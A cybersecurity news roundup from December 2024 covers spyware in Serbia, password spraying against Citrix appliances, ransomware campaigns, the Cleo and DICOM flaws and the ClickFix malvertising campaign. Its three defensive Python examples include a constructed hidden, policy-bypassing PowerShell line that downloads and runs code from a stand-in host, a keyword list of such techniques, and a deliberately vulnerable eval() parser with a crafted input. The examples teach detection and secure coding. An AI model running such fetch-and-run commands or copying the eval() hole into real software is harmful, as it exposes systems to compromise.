CybersecurityHQ News Roundup - December 15, 2024

News By Daniel Michan Published on December 16, 2024

Android Zero-Day Exploited in Spyware Campaigns, Amnesty International Points to Cellebrite

Amnesty International has uncovered a spyware campaign in Serbia that targets journalists and activists and relies on an Android zero-day. According to Amnesty, Serbian police used Cellebrite's UFED forensic tooling to unlock seized phones and get past their lock-screen protections, then installed a previously unknown Android spyware, dubbed NoviSpy, which Amnesty attributes to Serbian security agencies. In one case a journalist's phone was unlocked and infected while it was in police hands during a traffic stop; in another, an activist noticed suspicious battery drain after a series of unusual missed calls, a pattern consistent with a zero-click attack delivered over VoLTE or Wi-Fi calling.

Amnesty says the case exposes a gap in Serbian regulation of forensic tools. Cellebrite maintains that it enforces strict misuse policies, but Amnesty argues that pairing a phone-unlocking tool with highly invasive spyware raises serious human rights concerns. The zero-day sat in a Qualcomm chipset driver; Qualcomm shipped a fix in October 2024, but the affected chipsets are used in millions of Android devices, which stay exposed until their vendors deliver the patch. Read Amnesty’s full findings here.

Arctic Wolf Buys Cylance From BlackBerry for $160M Plus Stock, After $1.4B Acquisition in 2018

Managed security operations firm Arctic Wolf announced it will acquire Cylance from BlackBerry for $160 million in cash plus Arctic Wolf shares, a steep drop from the $1.4 billion BlackBerry paid in 2018. The deal, expected to close in BlackBerry’s fiscal fourth quarter (which ends in February 2025), folds Cylance’s AI-driven endpoint protection into Arctic Wolf’s open-XDR platform. “We aim to eliminate alert fatigue and reduce risk exposure,” said CEO Nick Schneider, touting a unified, end-to-end security solution. BlackBerry, meanwhile, is refocusing on its Secure Communications products and shedding the loss-making Cylance unit. Read more.

Citrix Warns of Password Spraying Attacks Targeting NetScaler Appliances

Citrix issued an advisory about large-scale password spraying attacks against NetScaler and NetScaler Gateway appliances, echoing earlier campaigns against Cisco and Fortinet remote-access devices. Unlike a classic brute-force attack, which hammers one account with many passwords and trips lockout thresholds, password spraying tries a few common passwords against many accounts, so no single account sees enough failures to lock. In this campaign the sheer volume of authentication requests also stressed the appliances themselves, causing excessive logging, resource exhaustion and service disruption. Citrix recommends enabling multi-factor authentication (MFA), blocking the offending source IPs (for example through the NetScaler Web App Firewall or IP reputation feeds), and reviewing log retention and rotation so that the flood of failed-login entries does not crash the appliance. Organizations seeing spikes in failed authentication attempts should compare them against the indicators of compromise in Citrix’s advisory.
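The distinguishing shape of a spray (one source, many accounts, one or two failures each) is easy to miss with per-account lockout rules but easy to see from the source side. The script below is an added example, not code from Citrix or its advisory: it parses a constructed, simplified auth-failure log (the real NetScaler AAA syslog format differs, so LINE_RE is an assumption to adapt) and flags sources whose failures inside a time window spread across many distinct usernames with few attempts per account.

```python
"""Detect password spraying in authentication failure logs.

Added example, not code from Citrix or its advisory. The log format is a
constructed approximation of an appliance auth-failure syslog line (timestamp,
source IP, username, result); adapt LINE_RE to the real NetScaler AAA format.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample data: one spraying source (6 users, 1 attempt each),
# one classic brute-forcer (1 user, 6 attempts) and one legitimate typo.
SAMPLE_LOG = """\
2024-12-13T10:00:01Z 203.0.113.10 user=alice result=FAIL
2024-12-13T10:00:02Z 203.0.113.10 user=bob result=FAIL
2024-12-13T10:00:03Z 203.0.113.10 user=carol result=FAIL
2024-12-13T10:00:04Z 203.0.113.10 user=dave result=FAIL
2024-12-13T10:00:05Z 203.0.113.10 user=erin result=FAIL
2024-12-13T10:00:06Z 203.0.113.10 user=frank result=FAIL
2024-12-13T10:01:00Z 198.51.100.7 user=bob result=FAIL
2024-12-13T10:01:01Z 198.51.100.7 user=bob result=FAIL
2024-12-13T10:01:02Z 198.51.100.7 user=bob result=FAIL
2024-12-13T10:01:03Z 198.51.100.7 user=bob result=FAIL
2024-12-13T10:01:04Z 198.51.100.7 user=bob result=FAIL
2024-12-13T10:01:05Z 198.51.100.7 user=bob result=FAIL
2024-12-13T10:02:00Z 192.0.2.5 user=alice result=FAIL
2024-12-13T10:02:30Z 192.0.2.5 user=alice result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+user=(?P<user>\S+)\s+result=(?P<result>\S+)$"
)


def parse_log(text):
    """Parse lines into dicts; unparseable lines are skipped rather than crashing the job."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "src": m["src"],
            "user": m["user"],
            "result": m["result"],
        })
    return events


def find_spray_sources(events, window=timedelta(minutes=10), min_users=5, max_per_user=3):
    """Return {source_ip: summary} for sources whose failures within `window`
    span at least `min_users` distinct accounts with at most `max_per_user`
    attempts each. That shape is what per-account lockout thresholds miss:
    each account sees only one or two failures, but the source touches many."""
    failures = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            failures[e["src"]].append(e)

    flagged = {}
    for src, evs in failures.items():
        evs.sort(key=lambda e: e["ts"])
        start, best = 0, None
        for end in range(len(evs)):  # sliding time window over this source's failures
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            users = Counter(e["user"] for e in evs[start:end + 1])
            if len(users) >= min_users and max(users.values()) <= max_per_user:
                if best is None or len(users) > best["distinct_users"]:
                    best = {
                        "distinct_users": len(users),
                        "attempts": end - start + 1,
                        "first_seen": evs[start]["ts"].isoformat(),
                    }
        if best:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    for src, info in find_spray_sources(parse_log(SAMPLE_LOG)).items():
        print(f"spray source {src}: {info}")
```

Only 203.0.113.10 is flagged: the brute-forcer 198.51.100.7 fails the distinct-user threshold (per-account lockout already covers it), and the legitimate typo never reaches five accounts. Tune the window and thresholds to your login volume, and remember that a distributed spray from many IPs needs the same count keyed on a shared fingerprint (user agent, TLS fingerprint, ASN) rather than on the source address.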

Undocumented DrayTek Vulnerabilities Exploited to Hack Hundreds of Orgs

Ransomware operators have exploited previously undocumented DrayTek router vulnerabilities, including a suspected zero-day, in a campaign that compromised 337 organizations. Security vendor Forescout and threat intelligence provider PRODAFT traced the activity to Monstrous Mantis, an initial access broker that harvested credentials from the compromised routers and passed them to other groups such as Ruthless Mantis and LARVA-15. Those groups used the access to deploy ransomware, chiefly Nokoyawa and Qilin, against businesses in Europe and Australia. DrayTek users should update to the latest firmware immediately. Full report here.

LKQ Hit by Cyberattack, Disrupting Canadian Operations

Auto parts giant LKQ Corporation disclosed a cyberattack impacting its Canadian business unit, causing weeks-long disruptions. LKQ, with operations in 1,600 locations worldwide, confirmed containment of the breach and reassured investors that the financial fallout remains minimal. The company is pursuing recovery costs through cybersecurity insurance. Details on the attacker or ransomware involvement remain unclear. More information.

SRP Federal Credit Union Ransomware Attack Exposes 240,000 Individuals

SRP Federal Credit Union is notifying over 240,000 affected customers of a ransomware attack between September and November 2024. Stolen data includes names, Social Security numbers, driver’s licenses, and financial information. The Nitrogen ransomware group, a newcomer in the cyber extortion scene, claims responsibility, allegedly exfiltrating 650GB of sensitive data. SRP is offering one year of free credit monitoring while warning customers to stay vigilant for identity theft. Details here.

Cl0p Claims Responsibility for Cleo Exploitation as New CVE Emerges

The Cl0p ransomware group has claimed responsibility for the recent attacks on Cleo’s Harmony, VLTrader and LexiCom file transfer products, continuing its focus on managed file transfer software. Cleo has since disclosed a new flaw, CVE-2024-55956, which lets an unauthenticated attacker drop files into the products’ Autorun directory, where they are executed automatically, yielding arbitrary command execution on the host. Cleo says this is separate from the earlier CVE-2024-50623 upload flaw, whose patch in version 5.8.0.21 did not stop the exploitation seen in the wild, and urges customers to update to version 5.8.0.24 and to disable the Autorun directory as an interim mitigation. Cl0p’s involvement recalls its MOVEit campaign and underlines the recurring pattern of zero-day exploitation in enterprise file transfer tools. Patch details.

Keepit Raises $50 Million for SaaS Data Protection Solution

Danish data protection provider Keepit secured a $50 million funding round led by One Peak and EIFO to accelerate product innovation and market expansion. Keepit’s SaaS platform simplifies enterprise data backup for tools like Microsoft 365, Salesforce, and Google Workspace. The funds will support broader coverage, improved data management features, and growth in Europe and the U.S. EIFO praised Keepit’s vendor-agnostic approach to cloud-native data protection. Learn more.

ConnectOnCall Breach Exposes 900,000 Patients’ Medical Data

ConnectOnCall, a patient communication tool, reported a data breach impacting 914,138 individuals, compromising medical records, dates of birth, and Social Security numbers. An attacker accessed its systems undetected between February and May 2024. The platform, widely used for after-hours healthcare coordination, has taken services offline pending security enhancements. Affected individuals are receiving free identity protection services. Full statement.

DeceptionAds Delivers 1M+ Daily Impressions Through 3,000 Sites

Researchers at Guardio Labs uncovered a large malvertising operation, dubbed DeceptionAds, that funnels visitors from more than 3,000 content sites, including pirated-content and download sites, into fake CAPTCHA pages. The page copies a Base64-encoded PowerShell one-liner to the clipboard and instructs the visitor to paste and run it through the Windows Run dialog, a “ClickFix”-style trick that sidesteps browser download protections; the command fetches and runs the Lumma information stealer. The traffic flows through the Monetag ad network and exceeds 1 million impressions a day, exposing thousands of users to credential theft. Following disclosure, Monetag suspended 200 accounts tied to the campaign. Read the research.
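The encoded command is what lands in process-creation telemetry after a victim follows the fake CAPTCHA instructions, and it is opaque until decoded: PowerShell's -EncodedCommand expects Base64 of UTF-16LE text, so a plain base64 -d yields NUL-interleaved bytes. The script below is an added example, not code from Guardio Labs' research: it decodes such a command line and scores it against a small, assumed indicator list. The sample command line is constructed here (the URL uses the reserved .invalid name and is not a real indicator).

```python
"""Decode and triage a `powershell -EncodedCommand` invocation of the kind a
ClickFix-style fake CAPTCHA pastes into the Run dialog.

Added example, not code from Guardio Labs' research. The sample command line is
constructed here (the URL is a reserved .invalid name, not a real IOC); the
indicator list is a starting point, not a complete signature set.
"""
import base64
import re

# PowerShell accepts -e, -ec, -enc and -EncodedCommand (also with a / prefix).
ENC_FLAG_RE = re.compile(r"(?i)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Substrings that, together, characterise "download and run, hidden" one-liners.
SUSPICIOUS = (
    "-w hidden", "bypass", "-enc", "iex", "invoke-expression",
    "iwr ", "invoke-webrequest", "downloadstring", "frombase64string", "mshta",
)


def encode_for_powershell(script):
    """What the attacker's page does: -EncodedCommand expects Base64 of UTF-16LE text,
    which is why `base64 -d` on Linux yields NUL-interleaved bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE: leave it for manual review


def triage(cmdline):
    """Match indicators against the visible command line with the Base64 blob removed
    plus the decoded payload, so random Base64 characters cannot produce false hits."""
    decoded = decode_encoded_command(cmdline)
    m = ENC_FLAG_RE.search(cmdline)
    visible = cmdline if not m else cmdline[:m.start(1)] + cmdline[m.end(1):]
    haystack = (visible + "\n" + (decoded or "")).lower()
    hits = [k for k in SUSPICIOUS if k in haystack]
    return {"decoded": decoded, "indicators": hits, "score": len(hits)}


# Constructed sample: hidden window, policy bypass, encoded "fetch and run" one-liner.
SAMPLE_SCRIPT = "iex (iwr 'http://example.invalid/c.txt' -UseBasicParsing).Content"
SAMPLE_CMDLINE = "powershell.exe -w hidden -ep bypass -enc " + encode_for_powershell(SAMPLE_SCRIPT)
BENIGN_CMDLINE = "powershell.exe -Command Get-Date"

if __name__ == "__main__":
    for c in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(triage(c))
```

Run it over Sysmon event 1 or 4688 command lines whose parent is explorer.exe (the Run dialog) rather than a script host: that parent-process context, combined with a decoded payload that downloads and invokes content, is the signal, while the indicator list on its own will also hit legitimate admin one-liners.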

Nomani Scam Targets Global Investors with AI and Deepfake Ads

A new AI-powered investment scam, dubbed Nomani, grew 335% between the first and second halves of 2024, according to ESET. It uses social media ads, fake endorsements and AI-generated videos of celebrities to lure victims, impersonating trusted brands and news outlets to phish personal data before pushing victims into fraudulent investments. The operation shows Russian-language indicators. Victims are then worked over in convincing follow-up phone calls that push them into loans and further losses. ESET advises users to verify ads and avoid unsolicited links. Full report.

Tic TAC Alert: RCE Vulnerability in Medical Imaging Software Patched

A critical remote code execution (RCE) flaw, CVE-2024-42845, was found in a widely used biomedical imaging tool that processes DICOM files. The vulnerable code passed attacker-controlled DICOM metadata to Python’s eval(), so a crafted image file executes arbitrary code on the workstation that parses it. The flaw is fixed in the latest release, but it shows how a single unsafe parsing shortcut in a medical imaging pipeline becomes a remote code execution path. Hospitals and clinics running affected DICOM tooling should update immediately. Technical breakdown.
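The bug class is worth seeing side by side with its fix. The block below is an added example, not the vulnerable project's code: the header dicts are a constructed stand-in for DICOM attributes as a tool might hold them after reading the file, and the function names are hypothetical. It shows eval() running a call expression planted in a PixelSpacing value, ast.literal_eval refusing the same input, and a parser for DICOM's native backslash-separated decimal strings that never touches the Python parser at all.

```python
"""eval() on file-controlled metadata beside a hardened parser.

Added example, not the vulnerable project's code: the header dicts below are a
constructed stand-in for DICOM attributes as an imaging tool might hold them
after reading the file, and the function names are hypothetical. The point is
the pattern, not the exact line that carried CVE-2024-42845.
"""
import ast

# Constructed header from a well-formed file. Real DICOM stores PixelSpacing
# (0028,0030) as a backslash-separated decimal string; some tools re-serialise
# such values as Python-looking lists, which is where eval() creeps in.
SAFE_HEADER = {"PixelSpacing": "[0.5, 0.5]"}
# Constructed header from a crafted file: a call expression instead of a literal.
# The payload is harmless here (returns the PID) to show that *any* Python runs.
MALICIOUS_HEADER = {"PixelSpacing": "__import__('os').getpid()"}


def parse_spacing_unsafe(header):
    """The vulnerable pattern: eval() executes whatever the file author wrote."""
    return eval(header["PixelSpacing"])  # intentionally vulnerable, for contrast


def parse_spacing_safe(header):
    """Hardened: literal_eval only accepts Python literals (no calls, names or
    attribute access), and the shape is validated afterwards."""
    try:
        value = ast.literal_eval(header["PixelSpacing"])
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise ValueError("PixelSpacing is not a literal") from exc
    if not (isinstance(value, list) and len(value) == 2
            and all(isinstance(v, (int, float)) and not isinstance(v, bool) for v in value)):
        raise ValueError("PixelSpacing must be a pair of numbers")
    return [float(v) for v in value]


def parse_ds(value, expected_len=None):
    """Better still: parse the native DICOM DS encoding ("0.5\\0.5") directly,
    which never involves the Python parser at all."""
    parts = [p.strip() for p in value.split("\\")]
    try:
        numbers = [float(p) for p in parts]
    except ValueError as exc:
        raise ValueError(f"invalid DS value: {value!r}") from exc
    if expected_len is not None and len(numbers) != expected_len:
        raise ValueError(f"expected {expected_len} values, got {len(numbers)}")
    return numbers


def rejects(parser, arg):
    """True if `parser(arg)` refuses the input with ValueError (used to show the fix holds)."""
    try:
        parser(arg)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("safe file:", parse_spacing_safe(SAFE_HEADER))
    print("eval on crafted file ran code, returned:", parse_spacing_unsafe(MALICIOUS_HEADER))
    print("literal_eval rejects crafted file:", rejects(parse_spacing_safe, MALICIOUS_HEADER))
    print("native DS:", parse_ds("0.5\\0.5", expected_len=2))
```

When auditing an imaging or data-science codebase, grep for eval(, exec( and the Python 2 holdover input() on anything derived from file contents; ast.literal_eval is the drop-in replacement where values really are Python literals, but a format-specific parser with an explicit schema, as parse_ds does for DS, is the better end state.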

Hackers Attacking YouTube Creators with Weaponized Collaboration Requests

YouTube creators are now prime targets of a sophisticated phishing campaign where hackers impersonate brands to distribute malware. According to reports, the attackers send professionally branded collaboration emails offering sponsorships or promotional deals. Within these emails, malicious links or password-protected files are disguised as legitimate contracts or promotional content.

Once opened, the files deploy malware such as Lumma Stealer, which exfiltrates login credentials, financial information, and intellectual property. The malware uses obfuscation to evade antivirus detection, manipulates clipboard data to hijack cryptocurrency wallet addresses, and establishes persistent remote access.

Experts warn creators to verify unsolicited collaboration requests, avoid suspicious links, and activate multi-factor authentication (MFA). The attack highlights the evolving sophistication of phishing campaigns targeting the influencer ecosystem. (Read More)

Federal Money Fuels State Cybersecurity, But Its Future is Uncertain

The U.S. federal cybersecurity grant program for state and local governments, created by the 2021 Infrastructure Investment and Jobs Act, has been a "game-changer" for underfunded municipalities fighting cyber threats. With $1 billion allocated over four years, the funds have paid for projects such as endpoint detection software, risk assessments, and employee cybersecurity training. However, the program is set to expire in 2025, raising concerns about its future.

State leaders, including Connecticut’s emergency management director William Turner, emphasize the grant’s importance for small communities. Without renewal, cash-strapped local governments may face halted upgrades, unpatched vulnerabilities, and increased cyber risks. While federal agencies like FEMA push for continued funding, political headwinds under a GOP-led Congress may put the program’s survival at risk. (Full Story)

Rhode Island Cyberattack Disrupts Benefits System, Personal Data Compromised

Rhode Island’s critical RIBridges benefits system, managed by consulting firm Deloitte, was targeted in a major extortion cyberattack. Governor Dan McKee confirmed sensitive data—including Social Security numbers and banking information—may have been leaked. The state shut down the system following the discovery of malicious files that posed a threat to public services like SNAP and Medicaid.

Authorities are advising affected residents to adopt credit monitoring, implement freezes, and enable two-factor authentication to prevent financial fraud. Deloitte, under scrutiny for leading negotiations with the hackers, faces questions about its role and liability. (Read More)

Namibia’s Telecom Provider Refuses Ransom, Hackers Leak Data

Hunters International ransomware group has published data stolen from Telecom Namibia after the company refused to pay an exorbitant ransom. The attack exposed personal and financial information belonging to customers and high-ranking officials. Telecom Namibia CEO Stanley Shanapinda emphasized their zero-tolerance policy for negotiating with cybercriminals.

The leaked data highlights gaps in Namibia’s cybersecurity laws, as the country’s Data Protection Act remains unenforced. Authorities, including President Nangolo Mbumba, are treating the incident as a matter of national security. (Full Report)

American Private Equity Firm Acquires Israeli Spyware Company Paragon

AE Industrial Partners, a U.S. private equity firm, has acquired Israeli spyware company Paragon for a reported $450-500 million, with the deal potentially rising to $900 million. Paragon, known for its Graphite spyware, can extract data from encrypted platforms like Signal and WhatsApp. Unlike its controversial peer NSO Group, Paragon has successfully navigated U.S. markets, securing contracts with ICE and the DEA.

While Paragon remains under scrutiny for its ethical use, the acquisition underscores continued demand for surveillance technologies in law enforcement. (Learn More)

Russia Bans Viber, Accusing App of Facilitating Illegal Activities

Russia’s internet regulator Roskomnadzor has banned Viber, alleging the messaging app supports terrorism, drug trafficking, and illegal content distribution. The move follows ongoing crackdowns on foreign tech platforms, including Google, YouTube, and Signal.

With over 17 million Russian users, Viber’s ban adds to concerns about growing internet isolation under Moscow’s Runet project. Experts speculate that other messaging apps, including WhatsApp and Telegram, could face similar restrictions as Russia intensifies digital censorship. (Read the Full Report)

Serbian Authorities Used Cellebrite to Covertly Install Spyware on Phones

Serbian authorities have combined Cellebrite’s phone-unlocking software with newly discovered spyware, dubbed NoviSpy, to surveil journalists and activists, Amnesty International reports. Victims reported their phones were tampered with during police detentions, enabling unauthorized spyware installation.

NoviSpy, produced in Serbia, grants remote access to phone data, cameras, and microphones. Amnesty researchers linked the spyware’s command servers to Serbian security forces, raising concerns about systemic surveillance abuse. Cellebrite’s involvement also draws scrutiny, with the company pledging to investigate misuse claims. (More Details)

Dell and Microsoft Partner to Boost AI and Cybersecurity Innovations

Dell Technologies is collaborating with Microsoft to enhance AI adoption and bolster cybersecurity in multicloud environments. Their newly announced Dell APEX File Storage for Azure offers managed cloud storage, simplifying AI workload deployment. Additional services include implementation support for Azure AI and security tools like AI-powered cyber recovery systems.

The partnership aims to streamline AI integration across Microsoft platforms like Copilot Studio and Azure AI Services, while strengthening zero-trust security protocols. Dell’s offerings focus on improving operational efficiency, enabling real-time data processing, and enhancing resilience against cyber threats. (Read More)

What Keeps Cybersecurity Experts Awake at Night? Unpatched Systems and Poor Security Habits

Regional cybersecurity leaders cite outdated systems, unpatched vulnerabilities, and insecure communication channels like WhatsApp as critical concerns. Experts warn that exploits like EternalBlue still pose risks to legacy systems, while poor network segmentation allows attackers to escalate breaches laterally.

The panel, including researchers and white-hat testers, emphasized the importance of layered defenses, encrypted communications, and stronger awareness of social engineering tactics like deepfake voice calls. As threat actors blend into legitimate network traffic, proactive monitoring and response remain critical. (Full Discussion)

FDA Cyber Chief Addresses Compliance Challenges for Medical Devices

The FDA’s cybersecurity requirements for medical devices, in effect since March 2023 under section 524B of the Federal Food, Drug, and Cosmetic Act and enforced in premarket submissions since October 2023, are driving improvements across the sector. Manufacturers of “cyber devices” now face stricter requirements, including a Software Bill of Materials (SBOM) and a plan for monitoring, identifying and addressing post-market vulnerabilities.

However, compliance challenges remain, with inconsistent SBOM data formats and legacy devices the main hurdles. Nastassia Tamari, who directs the FDA’s Division of Medical Device Cybersecurity, stresses that devices must be designed to be patchable if long-term risk is to be managed. The FDA is refining its processes to automate SBOM review and improve regulatory clarity. (Full Interview)